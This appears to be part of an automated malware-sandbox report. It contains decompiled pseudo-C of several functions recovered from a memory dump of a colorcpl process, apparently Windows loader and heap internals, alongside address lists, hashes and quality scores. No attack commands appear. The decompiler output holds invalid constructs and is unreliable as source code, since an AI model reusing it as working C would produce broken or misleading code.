                                                                                                0x06e2878d
                                                                                                0x06e28763
                                                                                                0x06e28763
                                                                                                0x06e28766
                                                                                                0x00000000
                                                                                                0x06e28766
                                                                                                0x06e79b70
                                                                                                0x00000000
                                                                                                0x06e79b70
                                                                                                0x06e28656
                                                                                                0x06e2865a
                                                                                                0x06e2865c
                                                                                                0x06e28752
                                                                                                0x06e28756
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2875e
                                                                                                0x00000000
                                                                                                0x06e2875e
                                                                                                0x06e28662
                                                                                                0x06e28662
                                                                                                0x06e28662
                                                                                                0x06e28666
                                                                                                0x00000000
                                                                                                0x06e28666
                                                                                                0x06e285b7
                                                                                                0x06e285b9
                                                                                                0x06e285bc
                                                                                                0x06e285bf
                                                                                                0x06e285cc
                                                                                                0x06e285d1
                                                                                                0x06e285d4
                                                                                                0x06e285db
                                                                                                0x06e285de
                                                                                                0x06e285e0
                                                                                                0x06e79b5f
                                                                                                0x00000000
                                                                                                0x06e79b5f
                                                                                                0x06e285e6
                                                                                                0x06e285ea
                                                                                                0x06e286c3
                                                                                                0x06e286c5
                                                                                                0x06e286c8
                                                                                                0x06e286ca
                                                                                                0x06e79b16
                                                                                                0x00000000
                                                                                                0x06e79b16
                                                                                                0x06e286d6
                                                                                                0x06e285f6
                                                                                                0x06e285f6
                                                                                                0x06e285f9
                                                                                                0x06e28602
                                                                                                0x06e28606
                                                                                                0x06e2860a
                                                                                                0x06e2860b
                                                                                                0x06e2860e
                                                                                                0x06e28611
                                                                                                0x00000000
                                                                                                0x06e28611
                                                                                                0x06e285f3
                                                                                                0x00000000
                                                                                                0x06e285f3
                                                                                                0x06e28619
                                                                                                0x06e2861e
                                                                                                0x06e2861e
                                                                                                0x06e28621
                                                                                                0x06e28622
                                                                                                0x06e28623
                                                                                                0x06e28625
                                                                                                0x06e2862c
                                                                                                0x00000000
                                                                                                0x06e2873d
                                                                                                0x00000000
                                                                                                0x06e2873d
                                                                                                0x06e28737
                                                                                                0x06e2850f
                                                                                                0x06e28512
                                                                                                0x00000000
                                                                                                0x06e28512
                                                                                                0x00000000
                                                                                                0x06e284d6

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 77ab16d0bd8b48119e7b49841e2b8701dc221250d59b138cbae7c48de2065a78
                                                                                                • Instruction ID: f83330e73f26c1f9ea1224caaf226a4f6e6bc3e4719c619c679aca28364fe54e
                                                                                                • Opcode Fuzzy Hash: 77ab16d0bd8b48119e7b49841e2b8701dc221250d59b138cbae7c48de2065a78
                                                                                                • Instruction Fuzzy Hash: D1B170B0E1031ADFDB94DFE8C984AAEBBBAFF44304F105129E515AB345D770A949CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 67%
                                                                                                			E06E4513A(intOrPtr __ecx, void* __edx) {
                                                                                                				signed int _v8;
                                                                                                				signed char _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				char _v28;
                                                                                                				signed int _v32;
                                                                                                				signed int _v36;
                                                                                                				signed int _v40;
                                                                                                				intOrPtr _v44;
                                                                                                				intOrPtr _v48;
                                                                                                				char _v63;
                                                                                                				char _v64;
                                                                                                				signed int _v72;
                                                                                                				signed int _v76;
                                                                                                				signed int _v80;
                                                                                                				signed int _v84;
                                                                                                				signed int _v88;
                                                                                                				signed char* _v92;
                                                                                                				signed int _v100;
                                                                                                				signed int _v104;
                                                                                                				char _v105;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* _t157;
                                                                                                				signed int _t159;
                                                                                                				signed int _t160;
                                                                                                				unsigned int* _t161;
                                                                                                				intOrPtr _t165;
                                                                                                				signed int _t172;
                                                                                                				signed char* _t181;
                                                                                                				intOrPtr _t189;
                                                                                                				intOrPtr* _t200;
                                                                                                				signed int _t202;
                                                                                                				signed int _t203;
                                                                                                				char _t204;
                                                                                                				signed int _t207;
                                                                                                				signed int _t208;
                                                                                                				void* _t209;
                                                                                                				intOrPtr _t210;
                                                                                                				signed int _t212;
                                                                                                				signed int _t214;
                                                                                                				signed int _t221;
                                                                                                				signed int _t222;
                                                                                                				signed int _t226;
                                                                                                				intOrPtr* _t232;
                                                                                                				signed int _t233;
                                                                                                				signed int _t234;
                                                                                                				intOrPtr _t237;
                                                                                                				intOrPtr _t238;
                                                                                                				intOrPtr _t240;
                                                                                                				void* _t245;
                                                                                                				signed int _t246;
                                                                                                				signed int _t247;
                                                                                                				void* _t248;
                                                                                                				void* _t251;
                                                                                                				void* _t252;
                                                                                                				signed int _t253;
                                                                                                				signed int _t255;
                                                                                                				signed int _t256;
                                                                                                
                                                                                                				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                                                                				_v8 =  *0x6f0d360 ^ _t255;
                                                                                                				_v32 = _v32 & 0x00000000;
                                                                                                				_t251 = __edx;
                                                                                                				_t237 = __ecx;
                                                                                                				_t212 = 6;
                                                                                                				_t245 =  &_v84;
                                                                                                				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                                                                				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                                                                				_v48 = __ecx;
                                                                                                				_v36 = _t207;
                                                                                                				_t157 = memset(_t245, 0, _t212 << 2);
                                                                                                				_t256 = _t255 + 0xc;
                                                                                                				_t246 = _t245 + _t212;
                                                                                                				if(_t207 == 2) {
                                                                                                					_t247 =  *(_t237 + 0x60);
                                                                                                					_t208 =  *(_t237 + 0x64);
                                                                                                					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                                                                					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                                                                					_v104 = _t159;
                                                                                                					_v76 = _t159;
                                                                                                					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                                                                					_v100 = _t160;
                                                                                                					_v72 = _t160;
                                                                                                					L19:
                                                                                                					_v80 = _t208;
                                                                                                					_v84 = _t247;
                                                                                                					L8:
                                                                                                					_t214 = 0;
                                                                                                					if( *(_t237 + 0x74) > 0) {
                                                                                                						_t82 = _t237 + 0x84; // 0x124
                                                                                                						_t161 = _t82;
                                                                                                						_v92 = _t161;
                                                                                                						while( *_t161 >> 0x1f != 0) {
                                                                                                							_t200 = _v92;
                                                                                                							if( *_t200 == 0x80000000) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t214 = _t214 + 1;
                                                                                                							_t161 = _t200 + 0x10;
                                                                                                							_v92 = _t161;
                                                                                                							if(_t214 <  *(_t237 + 0x74)) {
                                                                                                								continue;
                                                                                                							}
                                                                                                							goto L9;
                                                                                                						}
                                                                                                						_v88 = _t214 << 4;
                                                                                                						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                                                                						_t165 = 0;
                                                                                                						asm("adc eax, [ecx+edx+0x7c]");
                                                                                                						_v24 = _t165;
                                                                                                						_v28 = _v40;
                                                                                                						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                                                                						_t221 = _v40;
                                                                                                						_v16 =  *_v92;
                                                                                                						_v32 =  &_v28;
                                                                                                						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                                                                							goto L9;
                                                                                                						}
                                                                                                						_t240 = _v48;
                                                                                                						if( *_v92 != 0x80000000) {
                                                                                                							goto L9;
                                                                                                						}
                                                                                                						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                                                                						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                                                                						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                                                                						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                                                                						_t226 = 0;
                                                                                                						_t181 = _t251 + 0x66;
                                                                                                						_v88 = 0;
                                                                                                						_v92 = _t181;
                                                                                                						do {
                                                                                                							if( *((char*)(_t181 - 2)) == 0) {
                                                                                                								goto L31;
                                                                                                							}
                                                                                                							_t226 = _v88;
                                                                                                							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                                                                								_t181 = E06E5D0F0(1, _t226 + 0x20, 0);
                                                                                                								_t226 = _v40;
                                                                                                								 *(_t226 + 8) = _t181;
                                                                                                								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                                                                								L34:
                                                                                                								if(_v44 == 0) {
                                                                                                									goto L9;
                                                                                                								}
                                                                                                								_t210 = _v44;
                                                                                                								_t127 = _t210 + 0x1c; // 0x1c
                                                                                                								_t249 = _t127;
                                                                                                								E06E32280(_t181, _t127);
                                                                                                								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                                                                								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                                                                								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                                                                									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                                                                								}
                                                                                                								_t189 = L06E34620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                                                                								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                                                                								if(_t189 != 0) {
                                                                                                									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                                                                									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                                                                									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                                                                									 *_t232 = _t232 + 0x10;
                                                                                                									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                                                                									E06E5F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                                                                                									_t256 = _t256 + 0xc;
                                                                                                								}
                                                                                                								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                                                                								E06E2FFB0(_t210, _t249, _t249);
                                                                                                								_t222 = _v76;
                                                                                                								_t172 = _v80;
                                                                                                								_t208 = _v84;
                                                                                                								_t247 = _v88;
                                                                                                								L10:
                                                                                                								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                                                                								_v44 = _t238;
                                                                                                								if(_t238 != 0) {
                                                                                                									 *0x6f0b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                                                                									_v44();
                                                                                                								}
                                                                                                								_pop(_t248);
                                                                                                								_pop(_t252);
                                                                                                								_pop(_t209);
                                                                                                								return E06E5B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                                                                							}
                                                                                                							_t181 = _v92;
                                                                                                							L31:
                                                                                                							_t226 = _t226 + 1;
                                                                                                							_t181 =  &(_t181[0x18]);
                                                                                                							_v88 = _t226;
                                                                                                							_v92 = _t181;
                                                                                                						} while (_t226 < 4);
                                                                                                						goto L34;
                                                                                                					}
                                                                                                					L9:
                                                                                                					_t172 = _v104;
                                                                                                					_t222 = _v100;
                                                                                                					goto L10;
                                                                                                				}
                                                                                                				_t247 = _t246 | 0xffffffff;
                                                                                                				_t208 = _t247;
                                                                                                				_v84 = _t247;
                                                                                                				_v80 = _t208;
                                                                                                				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                                                                					_t233 = _v72;
                                                                                                					_v105 = _v64;
                                                                                                					_t202 = _v76;
                                                                                                				} else {
                                                                                                					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                                                                					_v105 = 1;
                                                                                                					if(_v63 <= _t204) {
                                                                                                						_v63 = _t204;
                                                                                                					}
                                                                                                					_t202 = _v76 |  *(_t251 + 0x40);
                                                                                                					_t233 = _v72 |  *(_t251 + 0x44);
                                                                                                					_t247 =  *(_t251 + 0x38);
                                                                                                					_t208 =  *(_t251 + 0x3c);
                                                                                                					_v76 = _t202;
                                                                                                					_v72 = _t233;
                                                                                                					_v84 = _t247;
                                                                                                					_v80 = _t208;
                                                                                                				}
                                                                                                				_v104 = _t202;
                                                                                                				_v100 = _t233;
                                                                                                				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                                                                					_t237 = _v48;
                                                                                                					_v105 = 1;
                                                                                                					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                                                                						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                                                                						_t237 = _v48;
                                                                                                					}
                                                                                                					_t203 = _t202 |  *(_t251 + 0xb8);
                                                                                                					_t234 = _t233 |  *(_t251 + 0xbc);
                                                                                                					_t247 = _t247 &  *(_t251 + 0xb0);
                                                                                                					_t208 = _t208 &  *(_t251 + 0xb4);
                                                                                                					_v104 = _t203;
                                                                                                					_v76 = _t203;
                                                                                                					_v100 = _t234;
                                                                                                					_v72 = _t234;
                                                                                                					_v84 = _t247;
                                                                                                					_v80 = _t208;
                                                                                                				}
                                                                                                				if(_v105 == 0) {
                                                                                                					_v36 = _v36 & 0x00000000;
                                                                                                					_t208 = 0;
                                                                                                					_t247 = 0;
                                                                                                					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                                                                					goto L19;
                                                                                                				} else {
                                                                                                					_v36 = 1;
                                                                                                					goto L8;
                                                                                                				}
                                                                                                			}































































                                                                                                0x06e86f13
                                                                                                0x06e86f17
                                                                                                0x06e86f17
                                                                                                0x06e86f18
                                                                                                0x06e86f1b
                                                                                                0x06e86f1f
                                                                                                0x06e86f23
                                                                                                0x00000000
                                                                                                0x06e86f28
                                                                                                0x06e45204
                                                                                                0x06e45204
                                                                                                0x06e45208
                                                                                                0x00000000
                                                                                                0x06e45208
                                                                                                0x06e45185
                                                                                                0x06e45188
                                                                                                0x06e4518a
                                                                                                0x06e4518e
                                                                                                0x06e45195
                                                                                                0x06e86db1
                                                                                                0x06e86db5
                                                                                                0x06e86db9
                                                                                                0x06e4519b
                                                                                                0x06e4519b
                                                                                                0x06e4519e
                                                                                                0x06e451a7
                                                                                                0x06e451a9
                                                                                                0x06e451a9
                                                                                                0x06e451b5
                                                                                                0x06e451b8
                                                                                                0x06e451bb
                                                                                                0x06e451be
                                                                                                0x06e451c1
                                                                                                0x06e451c5
                                                                                                0x06e451c9
                                                                                                0x06e451cd
                                                                                                0x06e451cd
                                                                                                0x06e451d8
                                                                                                0x06e451dc
                                                                                                0x06e451e0
                                                                                                0x06e86dcc
                                                                                                0x06e86dd0
                                                                                                0x06e86dd5
                                                                                                0x06e86ddd
                                                                                                0x06e86de1
                                                                                                0x06e86de1
                                                                                                0x06e86de5
                                                                                                0x06e86deb
                                                                                                0x06e86df1
                                                                                                0x06e86df7
                                                                                                0x06e86dfd
                                                                                                0x06e86e01
                                                                                                0x06e86e05
                                                                                                0x06e86e09
                                                                                                0x06e86e0d
                                                                                                0x06e86e11
                                                                                                0x06e86e11
                                                                                                0x06e451eb
                                                                                                0x06e86e1a
                                                                                                0x06e86e1f
                                                                                                0x06e86e21
                                                                                                0x06e86e23
                                                                                                0x00000000
                                                                                                0x06e451f1
                                                                                                0x06e451f1
                                                                                                0x00000000
                                                                                                0x06e451f1

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 898b3117e581b4eb70762140c5415b9f09d6e74b668bbbb73ae567773ee3fc84
                                                                                                • Instruction ID: cb43b6eaab8993592d073656a10af6ec7f821ba6daba6c2328c8214016b2c794
                                                                                                • Opcode Fuzzy Hash: 898b3117e581b4eb70762140c5415b9f09d6e74b668bbbb73ae567773ee3fc84
                                                                                                • Instruction Fuzzy Hash: 8EC113755083808FD394DF28C980A5AFBF1BF88308F14596EF9998B352D771E945CB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 74%
                                                                                                			E06E403E2(signed int __ecx, signed int __edx) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				signed int _v24;
                                                                                                				signed int _v28;
                                                                                                				signed int _v32;
                                                                                                				signed int _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				signed int _v44;
                                                                                                				signed int _v48;
                                                                                                				char _v52;
                                                                                                				char _v56;
                                                                                                				char _v64;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t56;
                                                                                                				signed int _t58;
                                                                                                				char* _t64;
                                                                                                				intOrPtr _t65;
                                                                                                				signed int _t74;
                                                                                                				signed int _t79;
                                                                                                				char* _t83;
                                                                                                				intOrPtr _t84;
                                                                                                				signed int _t93;
                                                                                                				signed int _t94;
                                                                                                				signed char* _t95;
                                                                                                				signed int _t99;
                                                                                                				signed int _t100;
                                                                                                				signed char* _t101;
                                                                                                				signed int _t105;
                                                                                                				signed int _t119;
                                                                                                				signed int _t120;
                                                                                                				void* _t122;
                                                                                                				signed int _t123;
                                                                                                				signed int _t127;
                                                                                                
                                                                                                				_v8 =  *0x6f0d360 ^ _t127;
                                                                                                				_t119 = __ecx;
                                                                                                				_t105 = __edx;
                                                                                                				_t118 = 0;
                                                                                                				_v20 = __edx;
                                                                                                				_t120 =  *(__ecx + 0x20);
                                                                                                				if(E06E40548(__ecx, 0) != 0) {
                                                                                                					_t56 = 0xc000022d;
                                                                                                					L23:
                                                                                                					return E06E5B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                                                                                				} else {
                                                                                                					_v12 = _v12 | 0xffffffff;
                                                                                                					_t58 = _t120 + 0x24;
                                                                                                					_t109 =  *(_t120 + 0x18);
                                                                                                					_t118 = _t58;
                                                                                                					_v16 = _t58;
                                                                                                					E06E2B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                                                                                					_v52 = 0x18;
                                                                                                					_v48 = 0;
                                                                                                					0x840 = 0x40;
                                                                                                					if( *0x6f07c1c != 0) {
                                                                                                					}
                                                                                                					_v40 = 0x840;
                                                                                                					_v44 = _t105;
                                                                                                					_v36 = 0;
                                                                                                					_v32 = 0;
                                                                                                					if(E06E37D50() != 0) {
                                                                                                						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                					} else {
                                                                                                						_t64 = 0x7ffe0384;
                                                                                                					}
                                                                                                					if( *_t64 != 0) {
                                                                                                						_t65 =  *[fs:0x30];
                                                                                                						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                                                                                						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                                                                                							_t100 = E06E37D50();
                                                                                                							__eflags = _t100;
                                                                                                							if(_t100 == 0) {
                                                                                                								_t101 = 0x7ffe0385;
                                                                                                							} else {
                                                                                                								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                							}
                                                                                                							__eflags =  *_t101 & 0x00000020;
                                                                                                							if(( *_t101 & 0x00000020) != 0) {
                                                                                                								_t118 = _t118 | 0xffffffff;
                                                                                                								_t109 = 0x1485;
                                                                                                								E06E97016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					_t105 = 0;
                                                                                                					while(1) {
                                                                                                						_push(0x60);
                                                                                                						_push(5);
                                                                                                						_push( &_v64);
                                                                                                						_push( &_v52);
                                                                                                						_push(0x100021);
                                                                                                						_push( &_v12);
                                                                                                						_t122 = E06E59830();
                                                                                                						if(_t122 >= 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						__eflags = _t122 - 0xc0000034;
                                                                                                						if(_t122 == 0xc0000034) {
                                                                                                							L38:
                                                                                                							_t120 = 0xc0000135;
                                                                                                							break;
                                                                                                						}
                                                                                                						__eflags = _t122 - 0xc000003a;
                                                                                                						if(_t122 == 0xc000003a) {
                                                                                                							goto L38;
                                                                                                						}
                                                                                                						__eflags = _t122 - 0xc0000022;
                                                                                                						if(_t122 != 0xc0000022) {
                                                                                                							break;
                                                                                                						}
                                                                                                						__eflags = _t105;
                                                                                                						if(__eflags != 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						_t109 = _t119;
                                                                                                						_t99 = E06E969A6(_t119, __eflags);
                                                                                                						__eflags = _t99;
                                                                                                						if(_t99 == 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						_t105 = _t105 + 1;
                                                                                                					}
                                                                                                					if( !_t120 >= 0) {
                                                                                                						L22:
                                                                                                						_t56 = _t120;
                                                                                                						goto L23;
                                                                                                					}
                                                                                                					if( *0x6f07c04 != 0) {
                                                                                                						_t118 = _v12;
                                                                                                						_t120 = E06E9A7AC(_t119, _t118, _t109);
                                                                                                						__eflags = _t120;
                                                                                                						if(_t120 >= 0) {
                                                                                                							goto L10;
                                                                                                						}
                                                                                                						__eflags =  *0x6f07bd8;
                                                                                                						if( *0x6f07bd8 != 0) {
                                                                                                							L20:
                                                                                                							if(_v12 != 0xffffffff) {
                                                                                                								_push(_v12);
                                                                                                								E06E595D0();
                                                                                                							}
                                                                                                							goto L22;
                                                                                                						}
                                                                                                					}
                                                                                                					L10:
                                                                                                					_push(_v12);
                                                                                                					_t105 = _t119 + 0xc;
                                                                                                					_push(0x1000000);
                                                                                                					_push(0x10);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0xf);
                                                                                                					_push(_t105);
                                                                                                					_t120 = E06E599A0();
                                                                                                					if(_t120 < 0) {
                                                                                                						__eflags = _t120 - 0xc000047e;
                                                                                                						if(_t120 == 0xc000047e) {
                                                                                                							L51:
                                                                                                							_t74 = E06E93540(_t120);
                                                                                                							_t119 = _v16;
                                                                                                							_t120 = _t74;
                                                                                                							L52:
                                                                                                							_t118 = 0x1485;
                                                                                                							E06E1B1E1(_t120, 0x1485, 0, _t119);
                                                                                                							goto L20;
                                                                                                						}
                                                                                                						__eflags = _t120 - 0xc000047f;
                                                                                                						if(_t120 == 0xc000047f) {
                                                                                                							goto L51;
                                                                                                						}
                                                                                                						__eflags = _t120 - 0xc0000462;
                                                                                                						if(_t120 == 0xc0000462) {
                                                                                                							goto L51;
                                                                                                						}
                                                                                                						_t119 = _v16;
                                                                                                						__eflags = _t120 - 0xc0000017;
                                                                                                						if(_t120 != 0xc0000017) {
                                                                                                							__eflags = _t120 - 0xc000009a;
                                                                                                							if(_t120 != 0xc000009a) {
                                                                                                								__eflags = _t120 - 0xc000012d;
                                                                                                								if(_t120 != 0xc000012d) {
                                                                                                									_v28 = _t119;
                                                                                                									_push( &_v56);
                                                                                                									_push(1);
                                                                                                									_v24 = _t120;
                                                                                                									_push( &_v28);
                                                                                                									_push(1);
                                                                                                									_push(2);
                                                                                                									_push(0xc000007b);
                                                                                                									_t79 = E06E5AAF0();
                                                                                                									__eflags = _t79;
                                                                                                									if(_t79 >= 0) {
                                                                                                										__eflags =  *0x6f08474 - 3;
                                                                                                										if( *0x6f08474 != 3) {
                                                                                                											 *0x6f079dc =  *0x6f079dc + 1;
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						goto L52;
                                                                                                					}
                                                                                                					if(E06E37D50() != 0) {
                                                                                                						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                					} else {
                                                                                                						_t83 = 0x7ffe0384;
                                                                                                					}
                                                                                                					if( *_t83 != 0) {
                                                                                                						_t84 =  *[fs:0x30];
                                                                                                						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                                                                                						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                                                                                							_t94 = E06E37D50();
                                                                                                							__eflags = _t94;
                                                                                                							if(_t94 == 0) {
                                                                                                								_t95 = 0x7ffe0385;
                                                                                                							} else {
                                                                                                								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                							}
                                                                                                							__eflags =  *_t95 & 0x00000020;
                                                                                                							if(( *_t95 & 0x00000020) != 0) {
                                                                                                								E06E97016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                                                                                						if( *0x6f08708 != 0) {
                                                                                                							_t118 =  *0x7ffe0330;
                                                                                                							_t123 =  *0x6f07b00; // 0x0
                                                                                                							asm("ror esi, cl");
                                                                                                							 *0x6f0b1e0(_v12, _v20, 0x20);
                                                                                                							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                                                                                							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                                                                                							asm("sbb esi, esi");
                                                                                                							_t120 =  ~_t50 & _t93;
                                                                                                						} else {
                                                                                                							_t120 = 0;
                                                                                                						}
                                                                                                					}
                                                                                                					if( !_t120 >= 0) {
                                                                                                						L19:
                                                                                                						_push( *_t105);
                                                                                                						E06E595D0();
                                                                                                						 *_t105 =  *_t105 & 0x00000000;
                                                                                                						goto L20;
                                                                                                					}
                                                                                                					_t120 = E06E27F65(_t119);
                                                                                                					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                                                                                						__eflags = _t120;
                                                                                                						if(_t120 < 0) {
                                                                                                							goto L19;
                                                                                                						}
                                                                                                						 *(_t119 + 0x64) = _v12;
                                                                                                						goto L22;
                                                                                                					}
                                                                                                					goto L19;
                                                                                                				}
                                                                                                			}
                                                                                                0x06e84e85
                                                                                                0x00000000
                                                                                                0x06e84e85
                                                                                                0x00000000
                                                                                                0x06e40517

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cbc2b25bfcfd7ab2bbda0f3cbf217f10216c46b2cf445550dbf9b52ea15b17e8
                                                                                                • Instruction ID: 5c11f359adf79742191307519a396129f88235f1fe53f83f0daaaa933f0daaed
                                                                                                • Opcode Fuzzy Hash: cbc2b25bfcfd7ab2bbda0f3cbf217f10216c46b2cf445550dbf9b52ea15b17e8
                                                                                                • Instruction Fuzzy Hash: EE91E631E00315DFEBB1AB78DC44BAD77E5EB01768F052261EA24AB2D1D7749D04CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 67%
                                                                                                			E06E1C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                                                                                				signed int _v8;
                                                                                                				char _v1036;
                                                                                                				signed int _v1040;
                                                                                                				char _v1048;
                                                                                                				signed int _v1052;
                                                                                                				signed char _v1056;
                                                                                                				void* _v1058;
                                                                                                				char _v1060;
                                                                                                				signed int _v1064;
                                                                                                				void* _v1068;
                                                                                                				intOrPtr _v1072;
                                                                                                				void* _v1084;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr _t70;
                                                                                                				intOrPtr _t72;
                                                                                                				signed int _t74;
                                                                                                				intOrPtr _t77;
                                                                                                				signed int _t78;
                                                                                                				signed int _t81;
                                                                                                				void* _t101;
                                                                                                				signed int _t102;
                                                                                                				signed int _t107;
                                                                                                				signed int _t109;
                                                                                                				signed int _t110;
                                                                                                				signed char _t111;
                                                                                                				signed int _t112;
                                                                                                				signed int _t113;
                                                                                                				signed int _t114;
                                                                                                				intOrPtr _t116;
                                                                                                				void* _t117;
                                                                                                				char _t118;
                                                                                                				void* _t120;
                                                                                                				char _t121;
                                                                                                				signed int _t122;
                                                                                                				signed int _t123;
                                                                                                				signed int _t125;
                                                                                                
                                                                                                				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                                                                                				_v8 =  *0x6f0d360 ^ _t125;
                                                                                                				_t116 = _a4;
                                                                                                				_v1056 = _a16;
                                                                                                				_v1040 = _a24;
                                                                                                				if(E06E26D30( &_v1048, _a8) < 0) {
                                                                                                					L4:
                                                                                                					_pop(_t117);
                                                                                                					_pop(_t120);
                                                                                                					_pop(_t101);
                                                                                                					return E06E5B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                                                                                				}
                                                                                                				_t70 = _a20;
                                                                                                				if(_t70 >= 0x3f4) {
                                                                                                					_t121 = _t70 + 0xc;
                                                                                                					L19:
                                                                                                					_t107 =  *( *[fs:0x30] + 0x18);
                                                                                                					__eflags = _t107;
                                                                                                					if(_t107 == 0) {
                                                                                                						L60:
                                                                                                						_t68 = 0xc0000017;
